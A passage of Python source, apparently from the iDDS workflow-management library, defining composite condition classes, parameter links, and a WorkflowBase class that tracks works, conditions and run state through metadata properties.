else:
new_cond = cond
new_value.append(new_cond)
value = new_value
elif key in ['_true_works', '_false_works']:
new_value = []
for w in value:
if isinstance(w, Work):
new_w = w.get_internal_id()
elif isinstance(w, CompositeCondition):
new_w = w.to_dict()
elif isinstance(w, Workflow):
new_w = w.to_dict()
else:
new_w = w
new_value.append(new_w)
value = new_value
else:
value = self.to_dict_l(value)
ret['attributes'][key] = value
return ret
def get_work_from_id(self, work_id, works):
return works[work_id]
def load_conditions(self, works):
new_conditions = []
for cond in self.conditions:
if callable(cond):
new_conditions.append(cond)
else:
if 'idds_method' in cond and 'idds_method_internal_id' in cond:
internal_id = cond['idds_method_internal_id']
work = self.get_work_from_id(internal_id, works)
if work is not None:
new_cond = getattr(work, cond['idds_method'])
else:
self.logger.error("Work cannot be found for %s" % (internal_id))
new_cond = cond
elif 'idds_attribute' in cond and 'idds_method_internal_id' in cond:
internal_id = cond['idds_method_internal_id']
work = self.get_work_from_id(internal_id, works)
if work is not None:
new_cond = getattr(work, cond['idds_attribute'])
else:
self.logger.error("Work cannot be found for %s" % (internal_id))
new_cond = cond
elif 'idds_method' in cond and 'idds_method_condition' in cond:
new_cond = cond['idds_method_condition']
new_cond = getattr(new_cond, cond['idds_method'])
else:
new_cond = cond
new_conditions.append(new_cond)
self.conditions = new_conditions
new_true_works = []
for w in self.true_works:
if isinstance(w, CompositeCondition) or isinstance(w, Workflow):
# work = w.load_conditions(works, works_template)
w.load_conditions(works)
work = w
elif type(w) in [str]:
work = self.get_work_from_id(w, works)
if work is None:
self.logger.error("Work cannot be found for %s" % str(w))
work = w
else:
self.logger.error("Work cannot be found for %s" % str(w))
work = w
new_true_works.append(work)
self.true_works = new_true_works
new_false_works = []
for w in self.false_works:
if isinstance(w, CompositeCondition) or isinstance(w, Workflow):
# work = w.load_conditions(works, works_template)
w.load_conditions(works)
work = w
elif type(w) in [str]:
work = self.get_work_from_id(w, works)
if work is None:
self.logger.error("Work cannot be found for %s" % str(w))
work = w
else:
self.logger.error("Work cannot be found for %s" % str(w))
work = w
new_false_works.append(work)
self.false_works = new_false_works
def all_works(self):
works = []
works = works + self.all_pre_works()
works = works + self.all_next_works()
return works
def all_condition_ids(self):
works = []
for cond in self.conditions:
if inspect.ismethod(cond):
if isinstance(cond.__self__, Work) or isinstance(cond.__self__, Workflow):
works.append(cond.__self__.get_internal_id())
elif isinstance(cond.__self__, CompositeCondition):
works = works + cond.__self__.all_condition_ids()
else:
self.logger.error("cond cannot be recognized: %s" % str(cond))
works.append(cond)
for work in self.true_works + self.false_works:
if isinstance(work, CompositeCondition):
works = works + work.all_condition_ids()
return works
def all_pre_works(self):
works = []
for cond in self.conditions:
if inspect.ismethod(cond):
if isinstance(cond.__self__, Work) or isinstance(cond.__self__, Workflow):
works.append(cond.__self__)
elif isinstance(cond.__self__, CompositeCondition):
works = works + cond.__self__.all_pre_works()
else:
self.logger.error("cond cannot be recognized: %s" % str(cond))
works.append(cond)
for work in self.true_works + self.false_works:
if isinstance(work, CompositeCondition):
works = works + work.all_pre_works()
return works
def all_next_works(self):
works = []
for work in self.true_works + self.false_works:
if isinstance(work, CompositeCondition):
works = works + work.all_next_works()
else:
works.append(work)
return works
def get_current_cond_status(self, cond):
if callable(cond):
if cond():
return True
else:
return False
else:
if cond:
return True
else:
return False
def get_cond_status(self):
if self.operator == ConditionOperator.And:
for cond in self.conditions:
if not self.get_current_cond_status(cond):
return False
return True
else:
for cond in self.conditions:
if self.get_current_cond_status(cond):
return True
return False
def get_condition_status(self):
return self.get_cond_status()
def is_condition_true(self):
if self.get_cond_status():
return True
return False
def is_condition_false(self):
if not self.get_cond_status():
return True
return False
def get_next_works(self, trigger=ConditionTrigger.NotTriggered):
works = []
if self.get_cond_status():
true_work_meta = self.get_metadata_item('true_works', {})
for work in self.true_works:
if isinstance(work, CompositeCondition):
works = works + work.get_next_works(trigger=trigger)
else:
if work.get_internal_id() not in true_work_meta:
true_work_meta[work.get_internal_id()] = {'triggered': False}
if trigger == ConditionTrigger.ToTrigger:
if not true_work_meta[work.get_internal_id()]['triggered']:
true_work_meta[work.get_internal_id()]['triggered'] = True
works.append(work)
elif trigger == ConditionTrigger.NotTriggered:
if not true_work_meta[work.get_internal_id()]['triggered']:
works.append(work)
elif trigger == ConditionTrigger.Triggered:
if true_work_meta[work.get_internal_id()]['triggered']:
works.append(work)
self.add_metadata_item('true_works', true_work_meta)
else:
false_work_meta = self.get_metadata_item('false_works', {})
for work in self.false_works:
if isinstance(work, CompositeCondition):
works = works + work.get_next_works(trigger=trigger)
else:
if work.get_internal_id() not in false_work_meta:
false_work_meta[work.get_internal_id()] = {'triggered': False}
if trigger == ConditionTrigger.ToTrigger:
if not false_work_meta[work.get_internal_id()]['triggered']:
false_work_meta[work.get_internal_id()]['triggered'] = True
works.append(work)
elif trigger == ConditionTrigger.NotTriggered:
if not false_work_meta[work.get_internal_id()]['triggered']:
works.append(work)
elif trigger == ConditionTrigger.Triggered:
if false_work_meta[work.get_internal_id()]['triggered']:
works.append(work)
self.add_metadata_item('false_works', false_work_meta)
return works
class AndCondition(CompositeCondition):
def __init__(self, conditions=[], true_works=None, false_works=None, logger=None):
super(AndCondition, self).__init__(operator=ConditionOperator.And,
conditions=conditions,
true_works=true_works,
false_works=false_works,
logger=logger)
class OrCondition(CompositeCondition):
def __init__(self, conditions=[], true_works=None, false_works=None, logger=None):
super(OrCondition, self).__init__(operator=ConditionOperator.Or,
conditions=conditions,
true_works=true_works,
false_works=false_works,
logger=logger)
class Condition(CompositeCondition):
def __init__(self, cond=None, current_work=None, true_work=None, false_work=None, logger=None):
super(Condition, self).__init__(operator=ConditionOperator.And,
conditions=[cond] if cond else [],
true_works=[true_work] if true_work else [],
false_works=[false_work] if false_work else [],
logger=logger)
# to support load from old conditions
@property
def cond(self):
# return self.get_metadata_item('true_works', [])
return self.conditions[0] if len(self.conditions) >= 1 else None
@cond.setter
def cond(self, value):
self.conditions = [value]
@property
def true_work(self):
# return self.get_metadata_item('true_works', [])
return self.true_works if len(self.true_works) >= 1 else None
@true_work.setter
def true_work(self, value):
self.true_works = [value]
@property
def false_work(self):
# return self.get_metadata_item('true_works', [])
return self.false_works if len(self.false_works) >= 1 else None
@false_work.setter
def false_work(self, value):
self.false_works = [value]
class TemplateCondition(CompositeCondition):
def __init__(self, cond=None, current_work=None, true_work=None, false_work=None, logger=None):
if true_work is not None and not isinstance(true_work, Work):
raise exceptions.IDDSException("true_work can only be set with Work class")
if false_work is not None and not isinstance(false_work, Work):
raise exceptions.IDDSException("false_work can only be set with Work class")
super(TemplateCondition, self).__init__(operator=ConditionOperator.And,
conditions=[cond] if cond else [],
true_works=[true_work] if true_work else [],
false_works=[false_work] if false_work else [],
logger=logger)
def validate_conditions(self, conditions):
if type(conditions) not in [tuple, list]:
raise exceptions.IDDSException("conditions must be list")
if len(conditions) > 1:
raise exceptions.IDDSException("Condition class can only support one condition. To support multiple condition, please use CompositeCondition.")
for cond in conditions:
assert(inspect.ismethod(cond))
assert(isinstance(cond.__self__, Work))
def add_condition(self, cond):
raise exceptions.IDDSException("Condition class doesn't support add_condition. To support multiple condition, please use CompositeCondition.")
class ParameterLink(Base):
def __init__(self, parameters):
super(ParameterLink, self).__init__()
self.parameters = {}
self.num_parameters = 0
if parameters:
if type(parameters) not in [list, tuple]:
parameters = [parameters]
for p in parameters:
if p:
if type(p) in [str]:
self.parameters[str(self.num_parameters)] = {'source': p, 'destination': p}
self.num_parameters += 1
elif type(p) in [dict] and 'source' in p and 'destination' in p:
self.parameters[str(self.num_parameters)] = {'source': p['source'], 'destination': p['destination']}
self.num_parameters += 1
else:
                        raise Exception("Cannot parse the parameters format. Accepted format: a list of strings or dicts {'source': <>, 'destination': <>}")
self.internal_id = str(uuid.uuid4())[:8]
self.template_id = self.internal_id
def get_internal_id(self):
return self.internal_id
def get_parameter_value(self, work, p):
ret = None
        p_f = getattr(work, p, None)
if p_f:
if callable(p_f):
ret = p_f()
else:
ret = p_f
else:
ret = None
if ret and type(ret) in [Collection] and hasattr(ret, 'to_origin_dict'):
ret = ret.to_origin_dict()
return ret
def set_parameters(self, work):
p_values = {}
for p in self.parameters:
p_values[p] = self.get_parameter_value(work, self.parameters[p]['source'])
self.add_metadata_item('parameters', p_values)
def get_parameters(self):
p_values = self.get_metadata_item('parameters', {})
ret = {}
for p in self.parameters:
if p in p_values:
ret[self.parameters[p]['destination']] = p_values[p]
return ret
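# Illustrative sketch (not part of the original module): the two parameter formats accepted
# by ParameterLink, matching the exception message in __init__ above. The attribute names
# 'output_data' and 'input_data' are hypothetical; set_parameters() snapshots the source
# work's value and get_parameters() exposes it under the destination name.
def _example_parameter_link_usage(source_work):
    # plain string: copy the attribute to the destination under the same name
    link_same_name = ParameterLink(parameters=['output_data'])
    # dict form: read 'output_data' from the source work, deliver it as 'input_data'
    link_renamed = ParameterLink(parameters=[{'source': 'output_data', 'destination': 'input_data'}])
    link_renamed.set_parameters(source_work)
    return link_same_name, link_renamed.get_parameters()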
class WorkflowBase(Base):
def __init__(self, name=None, workload_id=None, lifetime=None, pending_time=None, logger=None):
"""
Init a workflow.
"""
self._works = {}
self._conditions = {}
self._work_conds = {}
self.parameter_links = {}
self.parameter_links_source = {}
self.parameter_links_destination = {}
self._global_parameters = {}
super(WorkflowBase, self).__init__()
self.internal_id = str(uuid.uuid4())[:8]
self.template_work_id = self.internal_id
# self.template_work_id = str(uuid.uuid4())[:8]
self.lifetime = lifetime
self.pending_time = pending_time
if name:
self._name = name + "." + datetime.datetime.utcnow().strftime("%Y_%m_%d_%H_%M_%S_%f") + str(random.randint(1, 1000))
else:
self._name = 'idds.workflow.' + datetime.datetime.utcnow().strftime("%Y_%m_%d_%H_%M_%S_%f") + str(random.randint(1, 1000))
if workload_id is None:
workload_id = int(time.time())
self.workload_id = workload_id
self.logger = logger
if self.logger is None:
self.setup_logger()
self._works = {}
self.works = {}
self.work_sequence = {} # order list
self.terminated_works = []
self.initial_works = []
# if the primary initial_work is not set, it's the first initial work.
self.primary_initial_work = None
self.independent_works = []
self.first_initial = False
self.new_to_run_works = []
self.current_running_works = []
self.num_subfinished_works = 0
self.num_finished_works = 0
self.num_failed_works = 0
self.num_cancelled_works = 0
self.num_suspended_works = 0
self.num_expired_works = 0
self.num_total_works = 0
self.last_work = None
self.last_updated_at = datetime.datetime.utcnow()
self.expired = False
self.to_update_transforms = {}
# user defined Condition class
self.user_defined_conditions = {}
self.username = None
self.userdn = None
self.proxy = None
self._loop_condition_position = 'end'
self.loop_condition = None
self.num_run = None
self.global_parameters = {}
"""
self._running_data_names = []
for name in ['internal_id', 'template_work_id', 'workload_id', 'work_sequence', 'terminated_works',
'first_initial', 'new_to_run_works', 'current_running_works',
'num_subfinished_works', 'num_finished_works', 'num_failed_works', 'num_cancelled_works', 'num_suspended_works',
'num_expired_works', 'num_total_works', 'last_work']:
self._running_data_names.append(name)
for name in ['works']:
self._running_data_names.append(name)
"""
@property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
def get_template_work_id(self):
return self.template_work_id
def get_template_id(self):
return self.template_work_id
@property
def workload_id(self):
return self.get_metadata_item('workload_id')
@workload_id.setter
def workload_id(self, value):
self.add_metadata_item('workload_id', value)
@property
def lifetime(self):
# return self.get_metadata_item('lifetime', None)
return getattr(self, '_lifetime', None)
@lifetime.setter
def lifetime(self, value):
# self.add_metadata_item('lifetime', value)
self._lifetime = value
@property
def pending_time(self):
# return self.get_metadata_item('pending_time', None)
return getattr(self, '_pending_time', None)
@pending_time.setter
def pending_time(self, value):
# self.add_metadata_item('pending_time', value)
self._pending_time = value
@property
def last_updated_at(self):
last_updated_at = self.get_metadata_item('last_updated_at', None)
if last_updated_at and type(last_updated_at) in [str]:
last_updated_at = str_to_date(last_updated_at)
return last_updated_at
@last_updated_at.setter
def last_updated_at(self, value):
self.add_metadata_item('last_updated_at', value)
def has_new_updates(self):
self.last_updated_at = datetime.datetime.utcnow()
@property
def expired(self):
t = self.get_metadata_item('expired', False)
if type(t) in [bool]:
return t
elif type(t) in [str] and t.lower() in ['true']:
return True
else:
return False
@expired.setter
def expired(self, value):
self.add_metadata_item('expired', value)
@property
def works(self):
return self._works
@works.setter
def works(self, value):
self._works = value
work_metadata = {}
if self._works:
for k in self._works:
work = self._works[k]
if isinstance(work, Workflow):
work_metadata[k] = {'type': 'workflow',
'metadata': work.metadata}
else:
work_metadata[k] = {'type': 'work',
'work_id': work.work_id,
'workload_id': work.workload_id,
'external_id': work.external_id,
'status': work.status.value if work.status else work.status,
'substatus': work.substatus.value if work.substatus else work.substatus,
'next_works': work.next_works,
'transforming': work.transforming}
self.add_metadata_item('works', work_metadata)
def refresh_works(self):
work_metadata = {}
if self._works:
for k in self._works:
work = self._works[k]
if isinstance(work, Workflow):
work.refresh_works()
work_metadata[k] = {'type': 'workflow',
'metadata': work.metadata}
else:
work_metadata[k] = {'type': 'work',
'work_id': work.work_id,
'workload_id': work.workload_id,
'external_id': work.external_id,
'status': work.status.value if work.status else work.status,
'substatus': work.substatus.value if work.substatus else work.substatus,
'next_works': work.next_works,
'transforming': work.transforming}
if work.last_updated_at and (not self.last_updated_at or work.last_updated_at > self.last_updated_at):
self.last_updated_at = work.last_updated_at
self.add_metadata_item('works', work_metadata)
def load_works(self):
work_metadata = self.get_metadata_item('works', {})
for k in self._works:
if k in work_metadata:
if work_metadata[k]['type'] == 'work':
self._works[k].work_id = work_metadata[k]['work_id']
self._works[k].workload_id = work_metadata[k]['workload_id'] if 'workload_id' in work_metadata[k] else None
self._works[k].external_id = work_metadata[k]['external_id'] if 'external_id' in work_metadata[k] else None
self._works[k].transforming = work_metadata[k]['transforming']
self._works[k].status = WorkStatus(work_metadata[k]['status']) if work_metadata[k]['status'] else work_metadata[k]['status']
self._works[k].substatus = WorkStatus(work_metadata[k]['substatus']) if work_metadata[k]['substatus'] else work_metadata[k]['substatus']
self._works[k].next_works = work_metadata[k]['next_works'] if 'next_works' in work_metadata[k] else []
elif work_metadata[k]['type'] == 'workflow':
self._works[k].metadata = work_metadata[k]['metadata']
work = self._works[k]
if work.last_updated_at and (not self.last_updated_at or work.last_updated_at > self.last_updated_at):
self.last_updated_at = work.last_updated_at
@property
def conditions(self):
return self._conditions
@conditions.setter
def conditions(self, value):
self._conditions = value
conditions_metadata = {}
if self._conditions:
for k in self._conditions:
conditions_metadata[k] = self._conditions[k].metadata
self.add_metadata_item('conditions', conditions_metadata)
@property
def work_conds(self):
return self._work_conds
@work_conds.setter
def work_conds(self, value):
self._work_conds = value
# self.add_metadata_item('work_conds', value)
def load_work_conditions(self):
conditions_metadata = self.get_metadata_item('conditions', {})
for cond_internal_id in self._conditions:
if cond_internal_id in conditions_metadata:
self.conditions[cond_internal_id].metadata = conditions_metadata[cond_internal_id]
self.conditions[cond_internal_id].load_conditions(self.works)
# work_conds = self.get_metadata_item('work_conds', {})
# self._work_conds = work_conds
@property
def global_parameters(self):
self._global_parameters = self.get_metadata_item('gp', {})
return self._global_parameters
@global_parameters.setter
def global_parameters(self, value):
self._global_parameters = value
gp_metadata = {}
if self._global_parameters:
for key in self._global_parameters:
if key.startswith("user_"):
gp_metadata[key] = self._global_parameters[key]
else:
                    self.logger.warning("Only parameters starting with 'user_' can be set as global parameters. The parameter '%s' will be ignored." % (key))
self.add_metadata_item('gp', gp_metadata)
def set_global_parameters(self, value):
self.global_parameters = value
def sync_global_parameters_from_work(self, work):
self.log_debug("work %s is_terminated, global_parameters: %s" % (work.get_internal_id(), str(self.global_parameters)))
if self.global_parameters:
for key in self.global_parameters:
status, value = work.get_global_parameter_from_output_data(key)
self.log_debug("work %s get_global_parameter_from_output_data(key: %s) results(%s:%s)" % (work.get_internal_id(), key, status, value))
if status:
self.global_parameters[key] = value
elif hasattr(work, key):
self.global_parameters[key] = getattr(work, key)
self.set_global_parameters(self.global_parameters)
@property
def loop_condition(self):
return self._loop_condition
@loop_condition.setter
def loop_condition(self, value):
# self._loop_condition_position = position
self._loop_condition = value
if self._loop_condition:
self.add_metadata_item('loop_condition', self._loop_condition.get_condition_status())
@property
def work_sequence(self):
return self.get_metadata_item('work_sequence', {})
@work_sequence.setter
def work_sequence(self, value):
self.add_metadata_item('work_sequence', value)
@property
def terminated_works(self):
return self.get_metadata_item('terminated_works', [])
@terminated_works.setter
def terminated_works(self, value):
self.add_metadata_item('terminated_works', value)
@property
def first_initial(self):
return self.get_metadata_item('first_initial', False)
@first_initial.setter
def first_initial(self, value):
self.add_metadata_item('first_initial', value)
@property
def new_to_run_works(self):
return self.get_metadata_item('new_to_run_works', [])
@new_to_run_works.setter
def new_to_run_works(self, value):
self.add_metadata_item('new_to_run_works', value)
@property
def current_running_works(self):
return self.get_metadata_item('current_running_works', [])
@current_running_works.setter
def current_running_works(self, value):
self.add_metadata_item('current_running_works', value)
@property
def num_subfinished_works(self):
return self.get_metadata_item('num_subfinished_works', 0)
@num_subfinished_works.setter
def num_subfinished_works(self, value):
self.add_metadata_item('num_subfinished_works', value)
@property
def num_finished_works(self):
return self.get_metadata_item('num_finished_works', 0)
@num_finished_works.setter
def num_finished_works(self, value):
self.add_metadata_item('num_finished_works', value)
@property
def num_failed_works(self):
return self.get_metadata_item('num_failed_works', 0)
@num_failed_works.setter
def num_failed_works(self, value):
self.add_metadata_item('num_failed_works', value)
@property
def num_cancelled_works(self):
return self.get_metadata_item('num_cancelled_works', 0)
@num_cancelled_works.setter
def num_cancelled_works(self, value):
self.add_metadata_item('num_cancelled_works', value)
@property
def num_suspended_works(self):
return self.get_metadata_item('num_suspended_works', 0)
@num_suspended_works.setter
def num_suspended_works(self, value):
self.add_metadata_item('num_suspended_works', value)
@property
def num_expired_works(self):
return self.get_metadata_item('num_expired_works', 0)
@num_expired_works.setter
def num_expired_works(self, value):
self.add_metadata_item('num_expired_works', value)
@property
def num_total_works(self):
return self.get_metadata_item('num_total_works', 0)
@num_total_works.setter
def num_total_works(self, value):
self.add_metadata_item('num_total_works', value)
@property
def last_work(self):
return self.get_metadata_item('last_work', None)
@last_work.setter
def last_work(self, value):
self.add_metadata_item('last_work', value)
@property
def init_works(self):
return self.get_metadata_item('init_works', [])
@init_works.setter
def init_works(self, value):
self.add_metadata_item('init_works', value)
@property
def to_update_transforms(self):
return self.get_metadata_item('to_update_transforms', {})
@to_update_transforms.setter
def to_update_transforms(self, value):
self.add_metadata_item('to_update_transforms', value)
@property
def num_run(self):
return self.get_metadata_item('num_run', None)
@num_run.setter
def num_run(self, value):
if value is not None:
self.add_metadata_item('num_run', value)
def load_metadata(self):
self.load_works()
self.load_work_conditions()
self.load_parameter_links()
def get_class_name(self):
return self.__class__.__name__
def setup_logger(self):
"""
Setup logger
"""
self.logger = logging.getLogger(self.get_class_name())
def log_info(self, info):
if self.logger is None:
self.setup_logger()
self.logger.info(info)
def log_debug(self, info):
if self.logger is None:
self.setup_logger()
self.logger.debug(info)
def get_internal_id(self):
return self.internal_id
def copy(self):
new_wf = copy.deepcopy(self)
return new_wf
def __deepcopy__(self, memo):
logger = self.logger
self.logger = None
cls = self.__class__
result = cls.__new__(cls)
memo[id(self)] = result
# Deep copy all other attributes
for k, v in self.__dict__.items():
setattr(result, k, copy.deepcopy(v, memo))
self.logger = logger
result.logger = logger
return result
def get_works(self):
return self.works
def get_new_work_to_run(self, work_id, new_parameters=None):
# 1. initialize works
# template_id = work.get_template_id()
work = self.works[work_id]
if isinstance(work, Workflow):
work.sync_works()
work.sequence_id = self.num_total_works
work.parent_num_run = self.num_run
works = self.works
self.works = works
# self.work_sequence.append(new_work.get_internal_id())
self.work_sequence[str(self.num_total_works)] = work.get_internal_id()
self.num_total_works += 1
self.new_to_run_works.append(work.get_internal_id())
self.last_work = work.get_internal_id()
else:
new_parameters = self.get_destination_parameters(work_id)
if new_parameters:
work.set_parameters(new_parameters)
work.sequence_id = self.num_total_works
work.initialize_work()
work.sync_global_parameters(self.global_parameters)
work.renew_parameters_from_attributes()
work.num_run = self.num_run
works = self.works
self.works = works
# self.work_sequence.append(new_work.get_internal_id())
self.work_sequence[str(self.num_total_works)] = work.get_internal_id()
self.num_total_works += 1
self.new_to_run_works.append(work.get_internal_id())
self.last_work = work.get_internal_id()
return work
def get_new_parameters_for_work(self, work):
new_parameters = self.get_destination_parameters(work.get_internal_id())
if new_parameters:
work.set_parameters(new_parameters)
work.sequence_id = self.num_total_works
work.initialize_work()
work.sync_global_parameters(self.global_parameters)
work.renew_parameters_from_attributes()
works = self.works
self.works = works
return work
def register_user_defined_condition(self, condition):
cond_src = inspect.getsource(condition)
self.user_defined_conditions[condition.__name__] = cond_src
def load_user_defined_condition(self):
# try:
# Condition()
# except NameError:
# global Condition
# import Condition
for cond_src_name in self.user_defined_conditions:
# global cond_src_name
exec(self.user_defined_conditions[cond_src_name])
def set_workload_id(self, workload_id):
self.workload_id = workload_id
def get_workload_id(self):
return self.workload_id
def add_initial_works(self, work):
self.initial_works.append(work.get_internal_id())
if self.primary_initial_work is None:
self.primary_initial_work = work.get_internal_id()
def add_work(self, work, initial=False, primary=False):
self.first_initial = False
self.works[work.get_internal_id()] = work
if initial:
if primary:
self.primary_initial_work = work.get_internal_id()
self.add_initial_works(work)
self.independent_works.append(work.get_internal_id())
def add_condition(self, cond):
self.first_initial = False
cond_works = cond.all_works()
for cond_work in cond_works:
assert(cond_work.get_internal_id() in self.get_works())
conditions = self.conditions
conditions[cond.get_internal_id()] = cond
self.conditions = conditions
# if cond.current_work not in self.work_conds:
# self.work_conds[cond.current_work] = []
# self.work_conds[cond.current_work].append(cond)
work_conds = self.work_conds
for work in cond.all_pre_works():
if work.get_internal_id() not in work_conds:
work_conds[work.get_internal_id()] = []
work_conds[work.get_internal_id()].append(cond.get_internal_id())
self.work_conds = work_conds
# if a work is a true_work or false_work of a condition,
# should remove it from independent_works
cond_next_works = cond.all_next_works()
for next_work in cond_next_works:
if next_work.get_internal_id() in self.independent_works:
self.independent_works.remove(next_work.get_internal_id())
def find_workflow_from_work(self, work):
if work.get_internal_id() in self._works:
return self
else:
for k in self._works:
wk = self._works[k]
if isinstance(wk, Workflow):
wf = wk.find_workflow_from_work(work)
if wf:
return wf
return None
def add_parameter_link(self, work_source, work_destinations, parameter_link):
wf_s = self.find_workflow_from_work(work_source)
if not wf_s:
raise Exception("Cannot find work %s in the workflow." % work_source.get_internal_id())
if work_source.get_internal_id() not in wf_s.parameter_links_source:
wf_s.parameter_links_source[work_source.get_internal_id()] = []
wf_s.parameter_links_source[work_source.get_internal_id()].append(parameter_link.get_internal_id())
if type(work_destinations) not in [list, tuple]:
work_destinations = [work_destinations]
for work_destination in work_destinations:
wf = self.find_workflow_from_work(work_destination)
if not wf:
raise Exception("Cannot find work %s in the workflow." % work_destination.get_internal_id())
if parameter_link.get_internal_id() not in wf.parameter_links:
wf.parameter_links[parameter_link.get_internal_id()] = parameter_link
if work_destination.get_internal_id() not in wf.parameter_links_destination:
wf.parameter_links_destination[work_destination.get_internal_id()] = []
wf.parameter_links_destination[work_destination.get_internal_id()].append(parameter_link.get_internal_id())
def find_parameter_links_from_id(self, internal_id):
rets = []
if internal_id in self.parameter_links:
rets.append((self, self.parameter_links[internal_id]))
for k in self._works:
wk = self._works[k]
if isinstance(wk, Workflow):
links = wk.find_parameter_links_from_id(internal_id)
rets = rets + links
return rets
def refresh_parameter_links(self):
p_metadata = {}
for internal_id in self.parameter_links:
p_metadata[internal_id] = self.parameter_links[internal_id].metadata
self.add_metadata_item('parameter_links', p_metadata)
def get_parameter_links_metadata(self):
p_metadata = {}
for internal_id in self.parameter_links:
p_metadata[internal_id] = self.parameter_links[internal_id].metadata
self.add_metadata_item('parameter_links', p_metadata)
return p_metadata
def set_parameter_links_metadata(self, p_links):
for internal_id in self.parameter_links:
if internal_id in p_links:
p_metadata = p_links[internal_id]
self.parameter_links[internal_id].metadata = p_metadata
def set_source_parameters(self, internal_id):
work = self.works[internal_id]
# if type(work) in [Work]:
# print(work.work_id)
# print(internal_id)
# print(self.parameter_links_source)
if internal_id in self.parameter_links_source:
for p_id in self.parameter_links_source[internal_id]:
# print(p_id)
p_links = self.find_parameter_links_from_id(p_id)
# print(p_links)
for wf, p_link in p_links:
p_link.set_parameters(work)
wf.refresh_parameter_links()
def get_destination_parameters(self, internal_id):
# work = self.works[internal_id]
parameters = {}
if internal_id in self.parameter_links_destination:
for p_id in self.parameter_links_destination[internal_id]:
p_link = self.parameter_links[p_id]
parameters.update(p_link.get_parameters())
return parameters
def load_parameter_links(self):
p_metadata = self.get_metadata_item('parameter_links', {})
for p_id in self.parameter_links:
if p_id in p_metadata:
self.parameter_links[p_id].metadata = p_metadata[p_id]
def enable_next_works(self, work, cond):
self.log_debug("Checking Work %s condition: %s" % (work.get_internal_id(),
json_dumps(cond, sort_keys=True, indent=4)))
# load_conditions should cover it.
# if cond and self.is_class_method(cond.cond):
# # cond_work_id = self.works[cond.cond['idds_method_class_id']]
# cond.cond = getattr(work, cond.cond['idds_method'])
self.log_info("Work %s condition: %s" % (work.get_internal_id(), cond.conditions))
next_works = cond.get_next_works(trigger=ConditionTrigger.ToTrigger)
self.log_info("Work %s condition status %s" % (work.get_internal_id(), cond.get_cond_status()))
self.log_info("Work %s next works %s" % (work.get_internal_id(), str(next_works)))
new_next_works = []
if next_works is not None:
for next_work in next_works:
# parameters = self.get_destination_parameters(next_work.get_internal_id())
new_next_work = self.get_new_work_to_run(next_work.get_internal_id())
work.add_next_work(new_next_work.get_internal_id())
# cond.add_condition_work(new_next_work) ####### TODO:
new_next_works.append(new_next_work)
return new_next_works
def add_loop_condition(self, condition, position='end'):
self.loop_condition_position = position
self.loop_condition = condition
def has_loop_condition(self):
if self.loop_condition:
return True
return False
def get_loop_condition_status(self):
if self.has_loop_condition():
self.loop_condition.load_conditions(self.works)
return self.loop_condition.get_condition_status()
return False
def __str__(self):
return str(json_dumps(self))
def get_new_works(self):
"""
*** Function called by Marshaller agent.
new works to be ready to start
"""
self.sync_works()
works = []
for k in self.new_to_run_works:
if isinstance(self.works[k], Work):
self.works[k] = self.get_new_parameters_for_work(self.works[k])
works.append(self.works[k])
if isinstance(self.works[k], Workflow):
works = works + self.works[k].get_new_works()
for k in self.current_running_works:
if isinstance(self.works[k], Workflow):
works = works + self.works[k].get_new_works()
return works
def get_current_works(self):
"""
*** Function called by Marshaller agent.
Current running works
"""
self.sync_works()
works = []
for k in self.current_running_works:
if isinstance(self.works[k], Work):
works.append(self.works[k])
if isinstance(self.works[k], Workflow):
works = works + self.works[k].get_current_works()
return works
def get_all_works(self):
"""
*** Function called by Marshaller agent.
Current running works
"""
self.sync_works()
works = []
for k in self.works:
if isinstance(self.works[k], Work):
works.append(self.works[k])
if isinstance(self.works[k], Workflow):
works = works + self.works[k].get_all_works()
return works
def get_primary_initial_collection(self):
"""
*** Function called by Clerk agent.
"""
if self.primary_initial_work:
if isinstance(self.get_works()[self.primary_initial_work], Workflow):
return self.get_works()[self.primary_initial_work].get_primary_initial_collection()
else:
return self.get_works()[self.primary_initial_work].get_primary_input_collection()
elif self.initial_works:
if isinstance(self.get_works()[self.initial_works[0]], Workflow):
return self.get_works()[self.initial_works[0]].get_primary_initial_collection()
else:
return self.get_works()[self.initial_works[0]].get_primary_input_collection()
elif self.independent_works:
if isinstance(self.get_works()[self.independent_works[0]], Workflow):
return self.get_works()[self.independent_works[0]].get_primary_initial_collection()
else:
return self.get_works()[self.independent_works[0]].get_primary_input_collection()
else:
            keys = list(self.get_works().keys())
if isinstance(self.get_works()[keys[0]], Workflow):
return self.get_works()[keys[0]].get_primary_initial_collection()
else:
return self.get_works()[keys[0]].get_primary_input_collection()
return None
def get_dependency_works(self, work_id, depth, max_depth):
if depth > max_depth:
return []
deps = []
for dep_work_id in self.work_dependencies[work_id]:
deps.append(dep_work_id)
l_deps = self.get_dependency_works(dep_work_id, depth + 1, max_depth)
deps += l_deps
deps = list(dict.fromkeys(deps))
return deps
def order_independent_works(self):
ind_work_ids = self.independent_works
self.independent_works = []
self.work_dependencies = {}
for ind_work_id in ind_work_ids:
work = self.works[ind_work_id]
self.work_dependencies[ind_work_id] = []
for ind_work_id1 in ind_work_ids:
if ind_work_id == ind_work_id1:
continue
work1 = self.works[ind_work_id1]
if work.depend_on(work1):
self.work_dependencies[ind_work_id].append(ind_work_id1)
self.log_debug('work dependencies 1: %s' % str(self.work_dependencies))
max_depth = len(ind_work_ids) + 1
work_dependencies = copy.deepcopy(self.work_dependencies)
for work_id in work_dependencies:
deps = self.get_dependency_works(work_id, 0, max_depth)
self.work_dependencies[work_id] = deps
self.log_debug('work dependencies 2: %s' % str(self.work_dependencies))
while True:
for work_id in self.work_dependencies:
if work_id not in self.independent_works and len(self.work_dependencies[work_id]) == 0:
self.independent_works.append(work_id)
for work_id in self.independent_works:
if work_id in self.work_dependencies:
del self.work_dependencies[work_id]
for work_id in self.work_dependencies:
for in_work_id in self.independent_works:
if in_work_id in self.work_dependencies[work_id]:
self.work_dependencies[work_id].remove(in_work_id)
if not self.work_dependencies:
break
self.log_debug('independent_works: %s' % str(self.independent_works))
def first_initialize(self):
# set new_to_run works
if not self.first_initial:
self.first_initial = True
self.order_independent_works()
if self.initial_works:
tostart_works = self.initial_works
elif self.independent_works:
tostart_works = self.independent_works
else:
tostart_works = list(self.get_works().keys())
tostart_works = [tostart_works[0]]
init_works = []
for work_id in tostart_works:
self.get_new_work_to_run(work_id)
init_works.append(work_id)
self.init_works = init_works
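    # sync_works below drives the workflow state machine: it bootstraps the initial works,
    # promotes new_to_run works that have started transforming into current_running,
    # propagates parameters/global parameters and fires attached conditions when a work
    # terminates, and finally updates the per-status counters.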
def sync_works(self):
self.first_initialize()
self.refresh_works()
for k in self.works:
